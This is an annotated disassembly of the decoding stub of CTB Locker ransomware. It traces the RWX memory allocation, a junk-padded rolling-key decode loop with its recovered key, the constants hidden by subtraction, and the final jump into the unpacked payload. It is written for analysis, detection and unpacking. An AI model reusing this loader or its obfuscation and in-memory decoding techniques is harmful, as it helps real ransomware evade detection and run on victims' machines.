.text:004028D6 ; =====================================================================
.text:004028D6 ; DecodageProc -- decoding stub for the real CTB Locker payload.
.text:004028D6 ;
.text:004028D6 ; What the visible code does:
.text:004028D6 ;   1. VirtualAlloc(NULL, 0x674, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
.text:004028D6 ;   2. decode 0x674 bytes starting at unk_4055B7, one dword at a time,
.text:004028D6 ;      into the fresh RWX buffer
.text:004028D6 ;   3. jmp into that buffer
.text:004028D6 ;
.text:004028D6 ; Per-dword transform (only these instructions touch EAX/ECX/EDX/EBX/EDI
.text:004028D6 ; inside the loop; everything else operates on ESI and on bytes in the
.text:004028D6 ; 0x407000-0x4071FF range and looks like junk/obfuscation -- verify that
.text:004028D6 ; range is not read by the decoded stage before discarding it):
.text:004028D6 ;   key = 0x37497531
.text:004028D6 ;   for each little-endian dword E of src[0:0x674]:
.text:004028D6 ;       D   = (((~E) + 0xFFFFFFE7) ^ key) + 1      (mod 2^32)
.text:004028D6 ;       out += D
.text:004028D6 ;       key = rol32(D, 8)                          (rol 1 then rol 7)
.text:004028D6 ;   CF is explicitly cleared (clc) before the adc, so adc == add here.
.text:004028D6 ;
.text:004028D6 ; Register roles: EDX = source pointer, EBX = destination pointer,
.text:004028D6 ; EDI = bytes remaining (counts down by 4 from 0x674), ECX = rolling
.text:004028D6 ; key, EAX = dword being decoded.
.text:004028D6 ;
.text:004028D6 ; Notes for detection / analysis:
.text:004028D6 ;   - RWX allocation followed by an indirect jmp into it is the
.text:004028D6 ;     behavioural signature to hook (VirtualAlloc with flProtect 0x40).
.text:004028D6 ;   - The API arguments (0x40, 0x1000, 0x674) are built by subtracting
.text:004028D6 ;     two large immediates so the values never appear literally.
.text:004028D6 ;   - The loop counter is compared with exactly 0 (cmp edi,0 / jnz); it
.text:004028D6 ;     only terminates because 0x674 is a multiple of 4.
.text:004028D6 ;   - endProc (taken when VirtualAlloc fails) is outside this listing.
.text:004028D6 ; =====================================================================
.text:004028D6 DecodageProc:                           ; CODE XREF: .text:00401483
.text:004028D6                                         ; DATA XREF: .text:00402E11
.text:004028D6 ; Decoding routine for the real CTB Locker code
.text:004028D6 xor     edx, edx
.text:004028D8 sub     edx, offset unk_4055B7          ; EDX = -offset ...
.text:004028DE neg     edx                             ; ... then EDX = start of the encoded blob
.text:004028E0 sub     edi, edi
.text:004028E2 xor     edi, 674h                       ; EDI = 0x674 = size of the blob in bytes
.text:004028E8 mov     ecx, 37497531h                  ; ECX = initial decoding key
.text:004028E8 ; ========== VirtualAlloc ( NULL, 0x674, MEM_COMMIT, PAGE_EXECUTE_READWRITE); ==========
.text:004028ED push    ecx                             ; save ECX and EDX across the call (both are
.text:004028EE push    edx                             ; caller-saved under stdcall and may be clobbered)
.text:004028EF mov     ebx, 5F88252Bh
.text:004028F4 sub     ebx, 5F8824EBh
.text:004028FA push    ebx                             ; EBX = 0x40 -> flProtect = PAGE_EXECUTE_READWRITE
.text:004028FB mov     ebx, 5F8834EBh
.text:00402900 sub     ebx, 5F8824EBh
.text:00402906 push    ebx                             ; EBX = 0x1000 -> flAllocationType = MEM_COMMIT
.text:00402907 mov     ebx, 5F882B5Fh
.text:0040290C sub     ebx, 5F8824EBh
.text:00402912 push    ebx                             ; EBX = 0x674 -> dwSize
.text:00402913 mov     edx, 0
.text:00402918 push    edx                             ; lpAddress = NULL: let the system choose
.text:00402919 call    ds:VirtualAlloc
.text:0040291F pop     edx                             ; restore EDX (source pointer)
.text:00402920 pop     ecx                             ; restore ECX = 0x37497531 (key)
.text:00402921 test    eax, eax
.text:00402923 jz      endProc                         ; allocation failed -> bail out (endProc not shown here)
.text:00402929 lea     ebx, [eax]                      ; EBX = destination (the RWX pages)
.text:0040292B push    ebx                             ; keep the buffer address on the stack; it is
.text:0040292B                                         ; fetched back through ESP after the loop for the final jmp
.text:0040292C
.text:0040292C loc_40292C:                             ; CODE XREF: .text:00402DAE
.text:0040292C ; ---- loop body: one dword per iteration; only the instructions marked
.text:0040292C ; ---- [REAL] affect the decoding state, the rest appears to be junk
.text:0040292C mov     byte ptr dword_4070DD, 7Dh
.text:00402933 sbb     dword ptr byte_407127, esi
.text:00402939 mov     esi, dword ptr unk_40703E
.text:0040293F mov     byte ptr dword_40716B, 1Bh
.text:00402946 mov     esi, dword_407142+2
.text:0040294C sbb     esi, esi                        ; ESI = 0 or -1 depending on CF
.text:0040294E sbb     dword_40705A+1, esi
.text:00402954 sbb     dword ptr unk_4070A0, esi
.text:0040295A mov     esi, dword_40716B+2
.text:00402960 mov     byte ptr dword_40712A, 89h
.text:00402967 sbb     esi, esi
.text:00402969 add     dword_4070FD+2, esi
.text:0040296F sub     dword_407076+1, esi
.text:00402975 mov     byte_40709C, 0B6h
.text:0040297C mov     esi, dword ptr unk_4070A6
.text:00402982 adc     esi, 0FFFFFFAAh
.text:00402985 mov     esi, dword_407174+1
.text:0040298B xor     eax, eax                        ; [REAL] EAX = 0
.text:0040298D xor     eax, [edx]                      ; [REAL] EAX = next encoded dword
.text:0040298F mov     byte ptr dword_4070FD, 40h
.text:00402996 adc     dword ptr byte_4070E8, esi
.text:0040299C mov     byte ptr dword_40706A+1, 0DAh
.text:004029A3 or      dword_4070C7, esi
.text:004029A9 add     dword ptr unk_40712E, esi
.text:004029AF add     esi, esi
.text:004029B1 add     esi, esi
.text:004029B3 mov     byte ptr dword_407158, 11h
.text:004029BA sbb     dword ptr unk_4071A6, esi
.text:004029C0 and     esi, 0FFFFFFA3h
.text:004029C3 sbb     dword_407055, esi
.text:004029C9 add     esi, esi
.text:004029CB sbb     esi, esi
.text:004029CD and     dword_40710A+1, esi
.text:004029D3 sub     esi, 5Ch
.text:004029D6 adc     dword_407166+3, esi
.text:004029DC adc     dword ptr byte_407017, esi
.text:004029E2 mov     esi, dword_40716B+2
.text:004029E8 lea     edx, [edx+4]                    ; [REAL] advance source pointer (flags untouched)
.text:004029EB or      esi, 21h
.text:004029EE mov     byte ptr dword_40718D+1, 0B3h
.text:004029F5 mov     byte ptr dword_407130+2, 0A6h
.text:004029FC mov     byte_4071A8, 0B0h
.text:00402A03 add     dword_40706A+3, esi
.text:00402A09 and     esi, 3Ch
.text:00402A0C mov     dword_407076, esi
.text:00402A12 mov     esi, dword_407086+2
.text:00402A18 mov     byte_407101, 69h
.text:00402A1F or      esi, 0FFFFFF86h
.text:00402A22 or      esi, 0FFFFFFDAh
.text:00402A25 mov     esi, dword_407000
.text:00402A2B sbb     esi, esi
.text:00402A2D add     esi, esi
.text:00402A2F adc     dword_407051, esi
.text:00402A35 not     eax                             ; [REAL] step 1: EAX = ~EAX
.text:00402A37 mov     esi, dword_40701E
.text:00402A3D mov     dword_407035+1, esi
.text:00402A43 mov     esi, dword_407170
.text:00402A49 mov     esi, dword_407091
.text:00402A4F mov     byte ptr unk_4071C1, 98h
.text:00402A56 sbb     esi, 0FFFFFFF8h
.text:00402A59 sbb     esi, 0FFFFFFE3h
.text:00402A5C mov     esi, dword_40716B+2
.text:00402A62 add     esi, esi
.text:00402A64 mov     byte ptr dword_407170+1, 9Dh
.text:00402A6B and     esi, 0FFFFFFCEh
.text:00402A6E sub     esi, esi
.text:00402A70 or      esi, 73h
.text:00402A73 add     esi, esi
.text:00402A75 mov     esi, dword ptr byte_4071CB
.text:00402A7B clc                                     ; [REAL] CF = 0, so the adc below is a plain add
.text:00402A7C adc     eax, 0FFFFFFE7h                 ; [REAL] step 2: EAX += 0xFFFFFFE7 (i.e. EAX -= 0x19)
.text:00402A7F mov     esi, dword_40705A+2
.text:00402A85 adc     dword ptr byte_407181, esi
.text:00402A8B mov     esi, dword_407142
.text:00402A91 mov     byte ptr dword_407166, 5Ch
.text:00402A98 mov     byte_4070F3, 1Eh
.text:00402A9F add     esi, esi
.text:00402AA1 sub     esi, 7Ch
.text:00402AA4 mov     esi, dword_4070D7+2
.text:00402AAA sub     esi, esi
.text:00402AAC mov     byte ptr dword_4070B7+3, 0C5h
.text:00402AB3 or      esi, 1Ch
.text:00402AB6 adc     esi, esi
.text:00402AB8 mov     byte ptr unk_4071E7, 0ABh
.text:00402ABF mov     esi, dword ptr byte_40709D
.text:00402AC5 sbb     dword_407005+3, esi
.text:00402ACB mov     esi, dword ptr unk_407068
.text:00402AD1 mov     esi, dword_4071D5+1
.text:00402AD7 xor     dword ptr unk_4071DF, esi
.text:00402ADD mov     esi, dword_407105+2
.text:00402AE3 xor     eax, ecx                        ; [REAL] step 3: EAX ^= key
.text:00402AE5 xor     esi, 0FFFFFFDBh
.text:00402AE8 mov     esi, dword_407051+3
.text:00402AEE add     esi, 8
.text:00402AF1 add     esi, 7
.text:00402AF4 mov     esi, dword_40704C+2
.text:00402AFA add     esi, esi
.text:00402AFC mov     byte ptr dword_4070A1, 87h
.text:00402B03 mov     esi, dword_40710A+3
.text:00402B09 adc     esi, esi
.text:00402B0B sbb     esi, esi
.text:00402B0D mov     esi, dword_407055
.text:00402B13 xor     esi, 70h
.text:00402B16 mov     byte ptr dword_40706A, 48h
.text:00402B1D mov     byte ptr dword_4070AC+3, 9Ch
.text:00402B24 mov     dword_407188+1, esi
.text:00402B2A mov     esi, dword_40713E+2
.text:00402B30 and     esi, 31h
.text:00402B33 xor     esi, 3Dh
.text:00402B36 sbb     dword ptr unk_407156, esi
.text:00402B3C or      dword ptr byte_407101, esi
.text:00402B42 inc     eax                             ; [REAL] step 4: EAX += 1 -> decoded dword
.text:00402B43 mov     byte_4070E6, 9
.text:00402B4A xor     esi, esi
.text:00402B4C add     esi, esi
.text:00402B4E or      esi, 1Ch
.text:00402B51 and     esi, 0FFFFFFC2h
.text:00402B54 adc     esi, esi
.text:00402B56 mov     byte ptr dword_40702D+1, 76h
.text:00402B5D mov     esi, dword ptr byte_4070CF
.text:00402B63 mov     byte ptr dword_4071FB, 79h
.text:00402B6A mov     byte ptr unk_4070B0, 60h
.text:00402B71 or      dword ptr unk_4071F0, esi
.text:00402B77 mov     byte_407182, 19h
.text:00402B7E sbb     dword ptr unk_4071F8, esi
.text:00402B84 add     esi, 47h
.text:00402B87 sbb     esi, esi
.text:00402B89 mov     byte ptr dword_407134+3, 0E8h
.text:00402B90 mov     byte ptr dword_40719E, 85h
.text:00402B97 push    eax                             ; [REAL] ECX = EAX: the decoded dword becomes
.text:00402B98 pop     ecx                             ; [REAL] the basis of the key for the next dword
.text:00402B99 sub     esi, 0FFFFFFCCh
.text:00402B9C mov     byte ptr dword_407080+1, 9
.text:00402BA3 mov     esi, dword_40704C+3
.text:00402BA9 mov     esi, dword ptr byte_4070F2
.text:00402BAF mov     dword_4070AC+2, esi
.text:00402BB5 adc     dword ptr byte_4070F1, esi
.text:00402BBB add     esi, esi
.text:00402BBD mov     esi, dword_407138+1
.text:00402BC3 mov     esi, dword_4071B3+3
.text:00402BC9 mov     byte_4070C2, 45h
.text:00402BD0 sbb     dword_407063+3, esi
.text:00402BD6 add     esi, esi
.text:00402BD8 mov     esi, dword_4071C7+3
.text:00402BDE xor     esi, esi
.text:00402BE0 and     dword ptr unk_407067, esi
.text:00402BE6 add     dword ptr byte_40709F, esi
.text:00402BEC or      dword_40719A+2, esi
.text:00402BF2 rol     ecx, 1                          ; [REAL] rotate key left by 1 ...
.text:00402BF4 xor     esi, esi
.text:00402BF6 or      esi, 0FFFFFF85h
.text:00402BF9 xor     esi, 0FFFFFFF2h
.text:00402BFC add     esi, esi
.text:00402BFE or      dword ptr byte_4071A8, esi
.text:00402C04 mov     esi, dword ptr unk_4071E4
.text:00402C0A and     dword ptr unk_4071ED, esi
.text:00402C10 and     esi, 48h
.text:00402C13 add     esi, esi
.text:00402C15 mov     esi, dword_4070A7+1
.text:00402C1B adc     esi, 0FFFFFFB1h
.text:00402C1E mov     byte ptr dword_40717A, 25h
.text:00402C25 mov     byte ptr dword_4071FB, 3Ah
.text:00402C2C sub     dword ptr byte_40703F, esi
.text:00402C32 mov     byte_407059, 85h
.text:00402C39 or      esi, 0FFFFFFDAh
.text:00402C3C sbb     esi, 0FFFFFFC8h
.text:00402C3F or      dword_407170+1, esi
.text:00402C45 mov     byte ptr dword_4071D5+1, 29h
.text:00402C4C rol     ecx, 7                          ; [REAL] ... then by 7 more: key = rol32(D, 8)
.text:00402C4F sbb     esi, 3Fh
.text:00402C52 adc     esi, esi
.text:00402C54 add     esi, esi
.text:00402C56 adc     esi, esi
.text:00402C58 xor     esi, esi
.text:00402C5A mov     esi, dword_407055+1
.text:00402C60 mov     byte ptr unk_407015, 93h
.text:00402C67 mov     byte ptr dword_407184+3, 62h
.text:00402C6E mov     byte_407199, 0E2h
.text:00402C75 mov     esi, dword ptr unk_40713C
.text:00402C7B sbb     esi, esi
.text:00402C7D xor     esi, 0FFFFFF90h
.text:00402C80 mov     byte ptr dword_40716B+3, 4Ch
.text:00402C87 mov     esi, dword_407134+1
.text:00402C8D mov     byte_40702A, 0F7h
.text:00402C94 mov     esi, dword_407174+3
.text:00402C9A sub     esi, 0FFFFFFF0h
.text:00402C9D mov     esi, dword ptr unk_40711B
.text:00402CA3 mov     [ebx], eax                      ; [REAL] store the decoded dword into the RWX buffer
.text:00402CA5 or      esi, 0FFFFFFBEh
.text:00402CA8 sub     esi, esi
.text:00402CAA xor     esi, 61h
.text:00402CAD add     esi, 71h
.text:00402CB0 mov     esi, dword_407035+1
.text:00402CB6 add     dword_40705A+1, esi
.text:00402CBC or      dword_40702D+3, esi
.text:00402CC2 mov     byte ptr unk_4070FB, 0C5h
.text:00402CC9 mov     esi, dword_407113
.text:00402CCF mov     byte ptr dword_4071A2+1, 68h
.text:00402CD6 mov     esi, dword_407149+1
.text:00402CDC add     esi, esi
.text:00402CDE add     esi, 0FFFFFF84h
.text:00402CE1 adc     esi, esi
.text:00402CE3 add     esi, 5Dh
.text:00402CE6 mov     esi, dword_4071C7
.text:00402CEC mov     esi, dword_40707B
.text:00402CF2 add     dword_4071DA+3, esi
.text:00402CF8 sub     ebx, 0FFFFFFFCh                 ; [REAL] EBX += 4 (destination pointer)
.text:00402CFB xor     dword_407158, esi
.text:00402D01 mov     byte_4071D2, 0CAh
.text:00402D08 sbb     esi, esi
.text:00402D0A or      dword ptr byte_407042, esi
.text:00402D10 adc     esi, 0FFFFFFABh
.text:00402D13 mov     byte_40707A, 0F2h
.text:00402D1A mov     esi, dword_407117+1
.text:00402D20 mov     esi, dword ptr byte_4071F6
.text:00402D26 add     dword_40708D, esi
.text:00402D2C mov     esi, dword_4071B3
.text:00402D32 mov     byte_4071CD, 0CFh
.text:00402D39 mov     byte_407085, 95h
.text:00402D40 add     esi, esi
.text:00402D42 add     esi, 65h
.text:00402D45 add     esi, esi
.text:00402D47 mov     esi, dword_4071BD+2
.text:00402D4D add     edi, 0FFFFFFFCh                 ; [REAL] EDI -= 4 (bytes remaining)
.text:00402D50 mov     byte_4071CB, 6Eh
.text:00402D57 mov     byte ptr dword_4071DA, 2Ch
.text:00402D5E sbb     esi, 5Eh
.text:00402D61 xor     esi, esi
.text:00402D63 mov     byte ptr dword_40712A+2, 6Ah
.text:00402D6A mov     esi, dword_40706E+3
.text:00402D70 xor     esi, esi
.text:00402D72 sbb     esi, 0FFFFFFA1h
.text:00402D75 mov     esi, dword_407194+3
.text:00402D7B mov     esi, dword_4070E2+3
.text:00402D81 mov     esi, dword_40707B+3
.text:00402D87 mov     esi, dword ptr unk_407153
.text:00402D8D sbb     esi, esi
.text:00402D8F mov     byte ptr dword_407035, 0E7h
.text:00402D96 mov     esi, dword_4071AF+3
.text:00402D9C add     esi, esi
.text:00402D9E mov     byte ptr dword_407142+3, 5
.text:00402DA5 mov     esi, dword_407000+2
.text:00402DAB cmp     edi, 0                          ; [REAL] exact-zero test: relies on size % 4 == 0
.text:00402DAE jnz     loc_40292C                      ; [REAL] ===> back to the top for the next dword
.text:00402DAE ;
.text:00402DB4 ; ---- loop done: EDI = 0, EAX = last decoded dword, ECX = last key
.text:00402DB4 mov     ebx, esp                        ; EBX = ESP, which at this point holds the address of
.text:00402DB4                                         ; the RWX buffer pushed at 0040292B; it is the jmp target below
.text:00402DB6 mov     ecx, ds:GetModuleHandleA
.text:00402DBC push    ecx                             ; stack: [esp] = &GetModuleHandleA, [esp+4] = buffer
.text:00402DBD add     eax, edi                        ; EDI == 0 here, so EAX is unchanged (junk)
.text:00402DBF xor     edx, ecx
.text:00402DC1 adc     esi, esi
.text:00402DC3 mov     dl, byte ptr dword_4070F6+2
.text:00402DC9 xor     edx, 0FFFFFFA7h
.text:00402DCC and     dword_40712A+3, esi
.text:00402DD2 sbb     byte_407069, dl
.text:00402DD8 or      ch, 0B6h                        ; ECX is scribbled on after the push; the stack copy is intact
.text:00402DDB mov     byte_4070F4, 8Dh
.text:00402DE2 sbb     edi, edx
.text:00402DE4 and     esi, 4Fh
.text:00402DE7 add     edi, esi
.text:00402DE9 mov     esi, dword_4070BB+2
.text:00402DEF mov     byte ptr dword_407188+2, 4Fh
.text:00402DF6 mov     ah, byte ptr dword_407162+2     ; EAX is scribbled on too (overwritten again at 00402E18)
.text:00402DFC mov     esi, dword_407055+3
.text:00402E02 mov     byte_407180, 69h
.text:00402E09 sbb     dword ptr byte_4071D9, ecx
.text:00402E0F sub     esi, esi
.text:00402E11 push    offset DecodageProc             ; stack now: [esp] = &DecodageProc, [esp+4] = &GetModuleHandleA,
.text:00402E11                                         ; [esp+8] = buffer. If the decoded stage executes a `ret` it lands
.text:00402E11                                         ; back in DecodageProc (a fresh alloc+decode pass); the
.text:00402E11                                         ; GetModuleHandleA pointer presumably feeds its API resolution --
.text:00402E11                                         ; both are inferences, confirm against the decoded code.
.text:00402E16 add     edx, edx
.text:00402E18 mov     eax, dword_40717A+1
.text:00402E1D mov     byte ptr dword_4071DA, 0FBh
.text:00402E24 sbb     dword_40701E, edx
.text:00402E2A add     esi, edi
.text:00402E2C sbb     eax, 2Ch
.text:00402E2F xor     edi, 0FFFFFFF5h
.text:00402E32 xor     dword ptr unk_40718C, esi
.text:00402E38 sbb     dword_40710A, edi
.text:00402E3E sub     byte ptr unk_407121, ch
.text:00402E44 mov     edi, dword_4070A7+1
.text:00402E4A mov     edx, dword_40710A+1
.text:00402E50 mov     edi, dword ptr unk_407112
.text:00402E56 mov     byte_4070B6, 0FDh
.text:00402E5D add     edx, 0FFFFFFBDh
.text:00402E60 mov     byte ptr dword_4071BD+1, 27h
.text:00402E67 mov     edx, dword_4071AF
.text:00402E6D jmp     dword ptr [ebx]                 ; ==> transfer control to the decoded code in the RWX buffer.
.text:00402E6D                                         ; At this point EAX/ECX/EDX/EDI/ESI hold junk; only EBX (-> stack
.text:00402E6D                                         ; slot with the buffer address) and the stack layout above are
.text:00402E6D                                         ; meaningful to the next stage. Dump the buffer here when unpacking.